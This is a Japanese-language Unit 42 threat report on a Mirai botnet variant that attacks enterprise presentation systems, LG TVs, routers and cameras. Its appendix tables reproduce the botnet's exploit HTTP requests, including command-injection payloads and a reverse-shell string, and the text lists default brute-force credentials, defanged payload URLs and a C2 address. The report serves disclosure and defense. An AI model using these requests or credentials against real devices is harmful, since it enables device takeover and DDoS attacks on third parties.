[![Logo](https://www.paloaltonetworks.com/wp-content/uploads/2021/07/PANW_Parent.png)](https://www.paloaltonetworks.jp/)  
[![Unit42 Logo](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/unit42-logo-white.svg)](https://unit42.paloaltonetworks.com/ja/)  
Menu

* [セキュリティ コンサルティング](https://www.paloaltonetworks.com/unit42)
* [**現在、攻撃を受けていますか?**](https://start.paloaltonetworks.com/contact-unit42.html)  
  Japanese
* [English](https://unit42.paloaltonetworks.com/new-mirai-variant-targets-enterprise-wireless-presentation-display-systems/)
* [Japanese](https://unit42.paloaltonetworks.com/ja/new-mirai-variant-targets-enterprise-wireless-presentation-display-systems/)
* [Threat Research Center](https://unit42.paloaltonetworks.com/ja/ "Threat Research")
* [脅威リサーチ](https://unit42.paloaltonetworks.com/ja/category/threat-research-ja/ "脅威リサーチ")
* [マルウェア](https://unit42.paloaltonetworks.com/ja/category/malware-ja/ "マルウェア")  
  [マルウェア](https://unit42.paloaltonetworks.com/ja/category/malware-ja/)

# 新しいMirai亜種、エンタープライズワイヤレスプレゼンテーションとディスプレイシステムを標的に

![Clock Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-clock.svg) 3 分で読めます  
Related Products  
[![Advanced Threat Prevention icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/strata_RGB_logo_Icon_Color.png)Advanced Threat Prevention](https://unit42.paloaltonetworks.com/ja/product-category/advanced-threat-prevention-ja/ "Advanced Threat Prevention")[![Advanced URL Filtering icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/strata_RGB_logo_Icon_Color.png)Advanced URL Filtering](https://unit42.paloaltonetworks.com/ja/product-category/advanced-url-filtering-ja/ "Advanced URL Filtering")[![Advanced WildFire icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/strata_RGB_logo_Icon_Color.png)Advanced WildFire](https://unit42.paloaltonetworks.com/ja/product-category/advanced-wildfire-ja/ "Advanced WildFire")[![Cortex XDR icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/cortex_RGB_logo_Icon_Color.png)Cortex XDR](https://unit42.paloaltonetworks.com/ja/product-category/cortex-xdr-ja/ "Cortex XDR")

* ![Profile Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-profile-grey.svg)  
  著者:
  
  * [Ruchna Nigam](https://unit42.paloaltonetworks.com/ja/author/ruchna-nigam/)

* ![Published Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-calendar-grey.svg)  
  公開日:2019年3月18日

* ![Tags Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-category.svg)  
  カテゴリー
  
  * [脅威リサーチ](https://unit42.paloaltonetworks.com/ja/category/threat-research-ja/)
  * [マルウェア](https://unit42.paloaltonetworks.com/ja/category/malware-ja/)

* ![Tags Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-tags-grey.svg)  
  タグ:
  
  * [Defense](https://unit42.paloaltonetworks.com/ja/tag/defense-ja/)
  * [Education](https://unit42.paloaltonetworks.com/ja/tag/education-ja/)
  * [Finance](https://unit42.paloaltonetworks.com/ja/tag/finance-ja/)
  * [Government](https://unit42.paloaltonetworks.com/ja/tag/government-ja/)
  * [Health care](https://unit42.paloaltonetworks.com/ja/tag/health-care-ja/)
  * [High Tech](https://unit42.paloaltonetworks.com/ja/tag/high-tech-ja/)
  * [IoT](https://unit42.paloaltonetworks.com/ja/tag/iot-ja/)
  * [Linux](https://unit42.paloaltonetworks.com/ja/tag/linux-ja/)
  * [Mirai](https://unit42.paloaltonetworks.com/ja/tag/mirai-ja/)
  * [Retail](https://unit42.paloaltonetworks.com/ja/tag/retail-ja/)

* [![Download Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-download.svg)](https://unit42.paloaltonetworks.com/ja/new-mirai-variant-targets-enterprise-wireless-presentation-display-systems/?pdf=download&lg=ja&_wpnonce=40dbae5d0f "Click here to download")

* [![Print Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-print.svg)](https://unit42.paloaltonetworks.com/ja/new-mirai-variant-targets-enterprise-wireless-presentation-display-systems/?pdf=print&lg=ja&_wpnonce=40dbae5d0f "Click here to print")

共有![Down arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/down-arrow.svg)

* ![Link Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-share-link.svg)
* [![Link Email](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-sms.svg)](mailto:?subject=新しいMirai亜種、エンタープライズワイヤレスプレゼンテーションとディスプレイシステムを標的に&body=Check%20out%20this%20article%20https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Fnew-mirai-variant-targets-enterprise-wireless-presentation-display-systems%2F "Share in email")
* [![Facebook Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-fb-share.svg)](https://www.facebook.com/sharer/sharer.php?u=https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Fnew-mirai-variant-targets-enterprise-wireless-presentation-display-systems%2F "Share in Facebook")
* [![LinkedIn Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-linkedin-share.svg)](https://www.linkedin.com/sharing/share-offsite/?url=https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Fnew-mirai-variant-targets-enterprise-wireless-presentation-display-systems%2F&title=新しいMirai亜種、エンタープライズワイヤレスプレゼンテーションとディスプレイシステムを標的に "Share in LinkedIn")
* [![Twitter Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-twitter-share.svg)](https://twitter.com/intent/tweet?url=https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Fnew-mirai-variant-targets-enterprise-wireless-presentation-display-systems%2F&text=新しいMirai亜種、エンタープライズワイヤレスプレゼンテーションとディスプレイシステムを標的に "Share in Twitter")
* [![Reddit Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-reddit-share.svg)](https://www.paloaltonetworks.com//www.reddit.com/submit?url=https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Fnew-mirai-variant-targets-enterprise-wireless-presentation-display-systems%2F&ts=markdown "Share in Reddit")
* [![Mastodon Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-mastodon-share.svg)](https://mastodon.social/share?text=新しいMirai亜種、エンタープライズワイヤレスプレゼンテーションとディスプレイシステムを標的に%20https%3A%2F%2Funit42.paloaltonetworks.com%2Fja%2Fnew-mirai-variant-targets-enterprise-wireless-presentation-display-systems%2F "Share in Mastodon")

## 概要

2019年1月上旬、Unit 42は悪名高いIoT/Linuxボットネット[Mirai](https://unit42.paloaltonetworks.com/tag/mirai/)の新しい亜種を発見しました。

Miraiは2016年に前例のない大規模なDDoS攻撃に使用されたことで最もよく知られています。標的となった組織や個人にはウェブホスティングプロバイダ[OVH](https://www.ovh.com/world/news/articles/a2367.the-ddos-that-didnt-break-the-camels-vac)、DNSプロバイダー[Dyn](https://en.wikipedia.org/wiki/2016_Dyn_cyberattack)、[Brian Krebs氏のウェブサイト](https://krebsonsecurity.com/2016/09/krebsonsecurity-hit-with-record-ddos/)などがあげられます。

Unit 42が発見したこの新しい亜種は、ルーター、ネットワークストレージデバイス、NVR(ネットワークビデオレコーダー)、IPカメラなどのさまざまな組み込みデバイスを標的にし、多数のエクスプロイトを悪用している点で注目に値します。

Unit 42はこの亜種がWePresentのWiPG-1000 Wireless PresentationシステムとLGのSupersign TVを標的にしていることを突き止めました。両デバイスとも、企業での利用を想定した製品です。この事実から、今後Miraiの標的が企業に移行していく可能性が示唆されます。[以前確認したインスタンス](https://unit42.paloaltonetworks.jp/unit42-multi-exploit-iotlinux-botnets-mirai-gafgyt-target-apache-struts-sonicwall)でもボットネットが企業内の脆弱性を狙っている様子を観測しましたが、この事例ではApache StrutsとSonicWallに対するエクスプロイトを組み込んだものでした。

今回確認した新しいMiraiの亜種は標的が変化しており、新しいエクスプロイトが複数組み込まれ、さらにデバイスへのブルートフォース攻撃用の新しい資格情報も組み込まれています。

しかも、悪意のあるペイロードはコロンビアにある「*電子セキュリティ、インテグレーション、アラーム監視*」サービスを提供する侵害を受けたWebサイト上にホストされていました。

これらの新しい機能を受け、ボットネットの攻撃面はさらに広がります。とくに、エンタープライズのネットワークを標的にすればアクセスできる帯域幅が大きく広がることから、DDoS攻撃ボットネットの攻撃力がさらに高まります。

そしてMiraiのこうした方向性は、企業がネットワーク上のIoTデバイスを把握し、デフォルトパスワードを変更し、デバイスにパッチを完全に適用して最新の状態にすることの重要性を強調してもいます。パッチを適用できないデバイスの場合は、最後の手段としてそれらのデバイスをネットワークから外すべきです。

## エクスプロイト

この最新のサンプルには、合計27件のエクスプロイトが含まれていました。うち11件はMiraiに新規に追加されたものです。

Unit 42が観測したエクスプロイトの全リストは付録に記載されています。表1は、このサンプル以前にはインターネット上で観測されていなかったエクスプロイトの一覧です。表2は、この亜種に含まれるほかのエクスプロイトのうちインターネットでは最近になって初めて観測されたものの、このサンプル以前の亜種にも組み込まれていたことのあるエクスプロイトの一覧です。

## そのほかの機能

あまり一般的でないエクスプロイトを組み込んでいる以外にもこの新しい亜種には特徴的な機能がいくつかあります。

* 0xbeafdeadのテーブルキーを持つという特徴のあるMiraiと同じ暗号化方式を使用している
* このキーを使用して文字列を復号化するとブルートフォース用のデフォルト資格情報が見つかるが、これまで確認されたことのないあまり一般的でないものである
  * [admin:huigu309](https://www.websec.ca/publication/Blog/backdoors-in-Zhone-GPON-2520-and-Alcatel-Lucent-I240Q)
  * [root:huigu309](https://www.websec.ca/publication/Blog/backdoors-in-Zhone-GPON-2520-and-Alcatel-Lucent-I240Q)
  * [CRAFTSPERSON:ALC#FGU](https://www.websec.ca/publication/Blog/backdoors-in-Zhone-GPON-2520-and-Alcatel-Lucent-I240Q)
  * [root:videoflow](https://www.exploit-db.com/exploits/44387)
* C2通信にはドメインepicrustserver\[.\]cfのポート23823を使用
* ほかに脆弱なデバイスがあるかどうかをスキャンする以外に、この亜種は命令を受けてHTTP Flood DDoS攻撃を送出することが可能

## インフラ

皮肉なことに、この亜種のエクスプロイトによって取得されるシェルスクリプトのペイロード(この記事の執筆時点では依然稼働中)は、コロンビアにある\*「電子セキュリティ、インテグレーション、アラーム監視」\*サービスを提供する、侵害を受けたWebサイト上にホストされています。
![図1 エクスプロイトによって取得されるシェルスクリプトペイロード](https://unit42.paloaltonetworks.com/wp-content/uploads//2019/12/word-image-33-1024x344.png) 図1 エクスプロイトによって取得されるシェルスクリプトペイロード

さらに、シェルスクリプトによってダウンロードされるバイナリは\*"\*clean.\[arch\]" という形式(たとえば、clean.x86、clean.mipsなど)で命名されていました。ただし、これらはすでにウェブサイトでホストされていないようです。

ペイロードのソースから探索範囲を広げると、185\[.\]248.140.102/bins/にホストされていたものと同じペイロードを取得しているサンプルがいくつか見つかりました。またこの同じIPでは、今回の新しいマルチエクスプロイト型亜種へのアップグレードが行われる数日前に、"eeppinen.\[arch\]"という命名則を使ったGafgytサンプルが複数ホストされていました。

## 結論

IoT/Linuxボットネットは、多数のデバイスを標的として複数のエクスプロイトを組み込んだり、ブルートフォース攻撃に利用するデフォルトの資格情報リストに追加したり、あるいはその両方を行うことで、攻撃対象を拡大し続けています。さらに、企業の脆弱性を標的にすることで、消費者向けデバイスのネットワークよりも潜在的に広い帯域幅にアクセスできるようになり、DDoS攻撃の攻撃力が高めることができます。

パロアルトネットワークスのお客様は、次の方法でこの脅威から保護されています。

* WildFireは本稿に記載したすべてのサンプルを検出し「Malicious(悪意のある)」ものと判定します｡
* これらのキャンペーンに関連したすべてのエクスプロイト、IP、URLは、Threat PreventionとPAN DBによってブロックされます。

AutoFocusをお使いのお客様は、以下の個々のエクスプロイトタグを使用してこれらの活動を追跡できます:

* [CVE-2018-17173](https://autofocus.paloaltonetworks.com/#/tag/Unit42.CVE-2018-17173)
* [WePresentCmdInjection](https://autofocus.paloaltonetworks.com/#/tag/Unit42.WePresentCmdInjection)
* [DLinkRCE](https://autofocus.paloaltonetworks.com/#/tag/Unit42.DLinkRCE)
* [ZyxelP660HN\_RCE](https://autofocus.paloaltonetworks.com/#/tag/Unit42.ZyxelP660HN_RCE)
* [CVE-2016-1555](https://autofocus.paloaltonetworks.com/#/tag/Unit42.CVE-2016-1555)
* [NetgearDGN2200\_RCE](https://autofocus.paloaltonetworks.com/#/tag/Unit42.NetgearDGN2200_RCE)
* [NetgearProsafeRCE](https://autofocus.paloaltonetworks.com/#/tag/Unit42.NetgearProsafeRCE)
* [NetgearReadyNAS\_RCE](https://autofocus.paloaltonetworks.com/#/tag/Unit42.NetgearReadyNAS_RCE)
* [LinksysWAP54Gv3\_RCE](https://autofocus.paloaltonetworks.com/#/tag/Unit42.LinksysWAP54Gv3_RCE)
* [CVE-2013-3568](https://autofocus.paloaltonetworks.com/#/tag/Unit42.CVE-2013-3568)
* [ZTEH108L\_RCE](https://autofocus.paloaltonetworks.com/#/tag/Unit42.ZTEH108L_RCE)

本マルウェアファミリは、次のAutoFocusタグで追跡できます: [ELFMirai](https://autofocus.paloaltonetworks.com/#/tag/Unit42.ELFMirai)

## 付録

|--------------------------------------------------------------------------------------------------------------------------------------------------------------|-----------------------------------------------------------------------------------------------|----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| **脆弱性**                                                                                                                                                      | **影響を受けるデバイス**                                                                                | **エクスプロイトのリクエスト形式**                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              |
| [CVE-2018-17173](https://www.exploit-db.com/exploits/45448)                                                                                                  | LG Supersign TVs                                                                              | GET /qsrserver/device/getThumbnail?sourceUri="+-;rm+/tmp/f;mkfifo+/tmp/f;cat+/tmp/f+|+/bin/sh+-i+2\>\&1+|+;%s+supersign\_p%d; \>/tmp/f ;\&targetUri=/tmp/thumb/test.jpg\&mediaType=image\&targetWidth=400\&targetHeight=400\&scaleType=crop\&=1537275717150 HTTP/1.1  User-Agent: Hello, world Host: \[IP\]:\[Port\] Connection: keep-alive                                                                                                                                                                                                                                                                                                                                                                                                                                                                               |
| [WePresent WiPG-1000 Command Injection](https://www.exploit-db.com/exploits/41935)                                                                           | WePresent WiPG-1000 Wireless Presentation systems                                             | POST /cgi-bin/rdfs.cgi HTTP/1.1  Host: \[IP\]:\[Port\] Content-Type: application/x-www-form- Content-Length: 1024 Client=;%s+wepresent\_p%d;\&Download=submit                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                               |
| [DLink DCS-930L Remote Command Execution](https://www.exploit-db.com/exploits/39437)                                                                         | DLink DCS-930L Network Video Cameras                                                          | POST /setSystemCommand HTTP/1.1  Host: \[IP\]:\[Port\] Authorization: Basic YWRtaW46 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Content-Length: 1024 Connection: keep-alive ReplySuccessPage=docmd.htm\&ReplyErrorPage=docmd.htm\&SystemCommand=%s+dcs930l\_p%d;\&ConfigSystemCommand=Save                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              |
| [DLink diagnostic.php Command Execution](https://www.exploit-db.com/exploits/24956)                                                                          | DLink DIR-645, DIR-815 Routers                                                                | POST /diagnostic.php HTTP/1.  Host: \[IP\]:\[Port\] Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Content-Length: 512 act=ping\&dst=\&+;%s+dlinkdir\_p%d;\&                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                |
| [Zyxel P660HN Remote Command Execution](https://seclists.org/fulldisclosure/2017/Jan/40)                                                                     | Zyxel P660HN-T routers                                                                        | POST /cgi-bin/pages/maintenance/logSetting/logSet.asp HTTP/1.1  Host: \[IP\]:\[Port\] Connection: keep-alive logSetting\_H=1\&active=1\&logMode=LocalAndRemote\&serverPort=123\&serverIP=1.1.1.1;%s+P660HN-T\_p%d;\&# POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: \[IP\]:\[Port\] Connection: keep-alive remote\_submit\_Flag=1\&remote\_syslog\_Flag=1\&RemoteSyslogSupported=1\&LogFlag=0\&remote\_host=;%s+P660HN-T\_p%d;#\&remoteSubmit=Save                                                                                                                                                                                                                                                                                                                                                                                      |
| [CVE-2016-1555](https://www.exploit-db.com/exploits/45909)                                                                                                   | Netgear WG102, WG103, WN604, WNDAP350, WNDAP360, WNAP320, WNAP210, WNDAP660, WNDAP620 devices | GET /boardData102.php?writeData=true\&reginfo=0\&macAddress=+001122334455+-c+0+;%s+netgear102\_p%d;+echo+# HTTP/1.1  Host: \[IP\]:\[Port\] Connection: keep-alive GET /boardData103.php?writeData=true\&reginfo=0\&macAddress=+001122334455+-c+0+;%s+netgear103\_p%d;+echo+# HTTP/1.1 Host: \[IP\]:\[Port\] Connection: keep-alive GET /boardDataNA.php?writeData=true\&reginfo=0\&macAddress=+001122334455+-c+0+;%s+netgearNA\_p%d;+echo+# HTTP/1.1 Host: \[IP\]:\[Port\] Connection: keep-alive GET /boardDataWW.php?writeData=true\&reginfo=0\&macAddress=+001122334455+-c+0+;%s+netgearWW\_p%d;+echo+# HTTP/1.1 Host: \[IP\]:\[Port\] Connection: keep-alive GET /boardDataJP.php?writeData=true\&reginfo=0\&macAddress=+001122334455+-c+0+;%s+netgearJP\_p%d;+echo+# HTTP/1.1 Host: \[IP\]:\[Port\] Connection: keep-alive |
| [CVE-2017-6077](https://www.exploit-db.com/exploits/41394), [CVE-2017-6334](https://www.exploit-db.com/exploits/41459)                                       | Netgear DGN2200 N300 Wireless ADSL2+ Modem Routers                                            | POST /ping.cgi HTTP/1.1  Host: \[IP\]:\[Port\] Authorization: Basic YWRtaW46cGFzc3dvcmQ Referer: http://%s/DIAG\_diag.htm IPAddr1=12\&IPAddr2=12\&IPAddr3=12\&IPAddr4=12\&ping=Ping\&ping\_IPAddr=12.12.12.12;%s+dgn2200v1\_p%d; POST /dnslookup.cgi HTTP/1.1 Host: \[IP\]:\[Port\] Authorization: Basic YWRtaW46cGFzc3dvcmQ Referer: http://%s/DIAG\_diag.htm host\_name=www.google.com;+%s+dgn2200v2\_p%d\&lookup=Lookup                                                                                                                                                                                                                                                                                                                                                                                                       |
| [Netgear Prosafe Remote Command Execution](https://github.com/threat9/routersploit/blob/master/routersploit/modules/exploits/routers/netgear/prosafe_rce.py) | Netgear Prosafe WC9500, WC7600, WC7520 Wireless Controllers                                   | POST /login\_handler.php HTTP/1.1  Host: \[IP\]:\[Port\] Content-Type: application/x-www-form-urlencoded Content-Length: 512 reqMethod=json\_cli\_reqMethod\&json\_cli\_jsonData=;%s+prosafe\_p%d;+echo+ffffffffffffffff                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                         |

表1 Mirai亜種で使用されていた新しいエクスプロイト

この亜種に含まれていたエクスプロイトの中には、最近になって初めてインターネット上で観測されたものの、すでに以前のMirai亜種に組み込まれていることが確認されているものもありました。これらのエクスプロイトは表2に記載します。

|----------------------------------------------------------------------------------------------------------------------------------------------------|-----------------------------------------------------------------|-------------------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| **脆弱性**                                                                                                                                            | **影響を受けるデバイス**                                                  | **最初にインターネット上で確認された日時** | **エクスプロイトの形式**                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                   |
| [Netgear ReadyNAS](https://www.exploit-db.com/exploits/42956) Remote Command Execution/[CVE-2018-15716](https://www.exploit-db.com/exploits/45948) | Netgear ReadyNAS Surveillance 1.4.3-16 and NUUO NVRMini devices | Oct, 2017               | GET /upgrade\_handle.php?cmd=writeuploaddir\&uploaddir=%27;%s+readynas%d;%27 HTTP/1.1  Host: \[IP\]:\[Port\] Connection: keep-alive                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                         |
| [Linksys WAP54Gv3 Remote Debug Root Shell](https://seclists.org/bugtraq/2010/Jun/93)                                                               | Linksys WAP54G Wireless Access Points                           | Dec, 2018               | POST /debug.cgi HTTP/1.1  Host: \[IP\]:\[Port\] Content-Length: 1024 Connection: keep-alive Authorization: Basic R2VtdGVrOmdlbXRla3N3ZA data1=;%s+wap54gv3%d;\&command=ui\_debug                                                                                                                                                                                                                                                                                                                                                                                                                                                            |
| [CVE-2013-3568](https://www.exploit-db.com/exploits/28484)                                                                                         | Linksys WRT100, WRT110 consumer routers                         | Dec, 2018               | POST /ping.cgi HTTP/1.1  Host: \[IP\]:\[Port\] Content-Length: 1024 Connection: keep-alive Authorization: Basic YWRtaW46YWRtaW4 pingstr=\&+;%s+wrt100\_p%d;                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 |
| [ZTE Remote Command Execution](https://github.com/stasinopoulos/ZTExploit/blob/master/ZTExploit_Source/ztexploit.py)                               | ZTE ZXV10 H108L Routers with \<= V1.0.01\_WIND\_A01               | Oct, 2018               | GET /getpage.gch?pid=1002\&nextpage=manager\_dev\_ping\_t.gch\&Host=;+$(;%s+h108l\_p%d;)\&NumofRepeat=1\&DataBlockSize=64\&DiagnosticsState=Requested\&IF\_ACTION=new\&IF\_IDLE=submit HTTP/1.1  Host: \[IP\]:\[Port\] Connection: keep-alive Accept-Encoding: gzip, deflate Accept: \*/\*                                                                                                                                                                                                                                                                                                                                                       |
| [Linksys apply.cgi Remote Command Execution](https://www.exploit-db.com/exploits/24936)                                                            | Linksys E1500/E2500 routers                                     | --                      | POST /apply.cgi HTTP/1.1  Host: \[IP\]:\[Port\] Content-Length: 1024 Connection: keep-alive Authorization: Basic YWRtaW46YWRtaW4 submit\_button=Diagnostics\&change\_action=gozila\_cgi\&submit\_type=start\_ping\&action=\&commit=0\&ping\_ip=127.0.0.1\&ping\_size=\&;%s+e1500\_p%d;\&ping\_times=5\&traceroute\_ip=127.0.0.1 POST /apply.cgi HTTP/1.1 Host: \[IP\]:\[Port\] Content-Length: 1024 Connection: keep-alive Authorization: Basic YWRtaW46YWRtaW4 submit\_button=Diagnostics\&change\_action=gozila\_cgi\&submit\_type=start\_ping\&action=\&commit=0\&ping\_ip=127.0.0.1\&ping\_size=\&;%s+e2500\_p%d;\&ping\_times=5\&traceroute\_ip=127.0.0.1 |

表2 Mirai 亜種で使用されていたそのほかのエクスプロイト

残りのエクスプロイトは[以前のキャンペーン](https://unit42.paloaltonetworks.jp/unit42-multi-exploit-iotlinux-botnets-mirai-gafgyt-target-apache-struts-sonicwall)と関連して過去にすでに観測されたことがあり調査結果を報告されているものです。以下に一覧をあげます。

* [CVE-2017-6884](https://autofocus.paloaltonetworks.com/#/tag/Unit42.CVE-2017-6884)
* [GPON Exploits](https://autofocus.paloaltonetworks.com/#/tag/Unit42.GPONExploits)
* [AVTechRCE](https://autofocus.paloaltonetworks.com/#/tag/Unit42.AVTechRCE)
* [JAWS RCE](https://unit42.paloaltonetworks.com/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns)
* [DLinkOSInjection](https://autofocus.paloaltonetworks.com/#/tag/Unit42.DLinkOSInjection)
* [DLinkcommandphpRCE](https://autofocus.paloaltonetworks.com/#/tag/Unit42.DLinkcommandphpRCE)
* [DLinkDSL2750BOSCmdInjection](https://autofocus.paloaltonetworks.com/#/tag/Unit42.DLinkDSL2750BOSCmdInjection)
* [VacronNVRRCE](https://autofocus.paloaltonetworks.com/#/tag/Unit42.VacronNVRRCE)
* [Netgain 'ping' Command Injection](https://unit42.paloaltonetworks.jp/unit42-multi-exploit-iotlinux-botnets-mirai-gafgyt-target-apache-struts-sonicwall)
* [EnGeniusRCE](https://autofocus.paloaltonetworks.com/#/tag/Unit42.EnGeniusRCE)
* [Linksys RCE](https://autofocus.paloaltonetworks.com/#/tag/Unit42.Linksys_RCE)
* [Netgear](https://www.exploit-db.com/exploits/40889) [cgi-bin RCE](https://www.exploit-db.com/exploits/41598)

## IOC

### **ペイロードのソース**

* hxxp://www.autourbe\[.\]com.co/autourbe/language/en-GB/windata/wgetbin\[.\]sh

### **C2**

* epicrustserver\[.\]cf:23823

### **以前Miraiの亜種をホスティングしていたURL**

hxxp://www.autourbe\[.\]com.co/autourbe/language/en-GB/windata/clean.mips  
hxxp://www.autourbe\[.\]com.co/autourbe/language/en-GB/windata/clean.mpsl  
hxxp://www.autourbe\[.\]com.co/autourbe/language/en-GB/windata/clean.arm  
hxxp://www.autourbe\[.\]com.co/autourbe/language/en-GB/windata/clean.arm5n  
hxxp://www.autourbe\[.\]com.co/autourbe/language/en-GB/windata/clean.arm7  
hxxp://www.autourbe\[.\]com.co/autourbe/language/en-GB/windata/clean.sh4  
hxxp://www.autourbe\[.\]com.co/autourbe/language/en-GB/windata/clean.spc  
hxxp://www.autourbe\[.\]com.co/autourbe/language/en-GB/windata/clean.x86  
hxxp://www.autourbe\[.\]com.co/autourbe/language/en-GB/windata/clean.ppc  
hxxp://www.autourbe\[.\]com.co/autourbe/language/en-GB/windata/clean.i686  
hxxp://www.autourbe\[.\]com.co/autourbe/language/en-GB/windata/clean.m68k  
hxxp://www.autourbe\[.\]com.co/autourbe/language/en-GB/windata/clean.x86\_64  
hxxp://185.248\[.\]140.102/bins/clean.mips  
hxxp://185.248\[.\]140.102/bins/clean.mpsl  
hxxp://185.248\[.\]140.102/bins/clean.arm  
hxxp://185.248\[.\]140.102/bins/clean.arm5n  
hxxp://185.248\[.\]140.102/bins/clean.arm7  
hxxp://185.248\[.\]140.102/bins/clean.sh4  
hxxp://185.248\[.\]140.102/bins/clean.spc  
hxxp://185.248\[.\]140.102/bins/clean.x86  
hxxp://185.248\[.\]140.102/bins/clean.ppc  
hxxp://185.248\[.\]140.102/bins/clean.i686  
hxxp://185.248\[.\]140.102/bins/clean.m68k  
hxxp://185.248\[.\]140.102/bins/clean.x86\_64

**新しいMirai亜種のサンプル**

00033b5b33b59ad88aa4f196c08eb7a6d2e6ab181ec729e8ed577d55f8b1f3ee  
02975fa7929a2f98963d6431f24cf4de702eb42530ac505c47d7567cf002c3d5  
05dc7657dc240fe7f42c3ffe95526d161151dd62f8f63188fe666ed86b0347c3  
075729594c4883fda420c0749be695d6d771eb61b569ac9b0124738db0f864ef  
07f22804757914c7a16e90bdd7ee26596f04995e5f8b90ca8d746c46039bb1c8  
09d75b526c79ac98b4c07ca1f28319ac1b6cafcadd0c41b71e82252211390b3d  
0b1a51ac04a949197c4c47d589872663be05747e18e20e7f20a24b011f4db0dd  
0c42ba60d95eda9cf90f7f1dbe5bcb316d871972eff9722748e9c2a343572484  
233094f242ce7626a5a5c1fe46ee205da279e03019b8a391bcc3fa41ce77b647  
234a05ac1970af58b6f76dca22aa25bece2ef1d65f4146748f6b859a19f91d31  
2764a0a0ab9faf04478fef4fd8ec948da431885cafa6ddf0c23ef8cda379c7d9  
28de1263449d88e986e37e7ce74ebc0b6cfceaeb3d5beb5dff296354f33dbf8c  
324eb05d47b3114c48f6505db5e4cd7c81110c42488e07c547afd7869690231f  
33a8b157e2fdd1acddc5085843a5ac96ee6f9df29c8f48a483bd4eebd16f73cc  
36d72d137abc2a43a5f6c00c9a8e41f1faf5e89643e5add1529f7343a731856f  
3eccc01f6677567b0aeea89b6e50c7184698732287c29f95000acc102c02dd47  
3f299938339bc426c5d78b55a1398da31f948f7c30d6115ab30a656cdd78de35  
403e702fa7e8b0a4ebde7db2e505645507b12ef0306619fb2523dea5cdf2f40d  
4111155bfc2f0b005d763ff4cd05e60187bdc29d3b17d0971f736da779595a9a  
4495af4264d11e339c4ba9776fd79c7b5554b70bbb6cc875ed7a03b7eef15f8a  
44ae362714ba76c65150a363b0b340a5bd422649e48df37661ba1db8e0ec0f9e  
46a58cfa883c71b9066b2ffe7ce475676570e9940327782927b559ea9a47df88  
4a7bd1ab7a9505dec2d83f44b2d99f3068823db9d9d888333ccfdd239cc72192  
4ebbcfeaad77207f82d072651cae53741e6af464c61735e33e385fba8edf3f61  
4f3e5d72f53d59f932b606f440428608b5bbd4afa8ed33148e322e0096465130  
5ebfd332bc5b9697d7b07e37600d495489da1b892288f051c56c8aba9574bed7  
613e74f2d3549fe9b76eaa404b20fe87ea89672c4bf2f0d1cf88be4d657ea323  
684a4c2e426a146c2217d3e62b7f7c69ea12628d182b2441c840bddacc1597f2  
77b059f2f5b62d059fd9e3dfaf41cbeb7543ef288410f3c85a090bf03be99b24  
884929e31c2cb8dc7e51949d94fe5073216be967f83f8013e0980d8959141234  
892efa131b0cd6ca87fa0c2e3006c8352947cfc40ac0adf51a55b711a806aa80  
8c9a3f8c94210813287b2789f63410d4744f3422a8012d6b1bc60a307884732c  
8d1700c0144d6e56d8ba4e4061694c1194a7d0bc63740a1bdebf2697e46b3978  
8d28628e8a31b39e178ba8c7dd781ea19db5ec3fe20f84ba20228c47a49aa543  
8eb7eafb26235796534ba9deeada27b4e25e7c45d9b87715ee6d4182b3ca6068  
8f2e458607f85f4c22ca7135df5fa2649c9979f2bb69036b3c63de52ec2f14f0  
938e836c5035d52f954ff91fd5008a9444a3efa3e07592ceefc9efebd260b085  
95ee8502a7cbac8cb21471fc40d86ddefa87ef9790f0c06d47fe47c3a2278396  
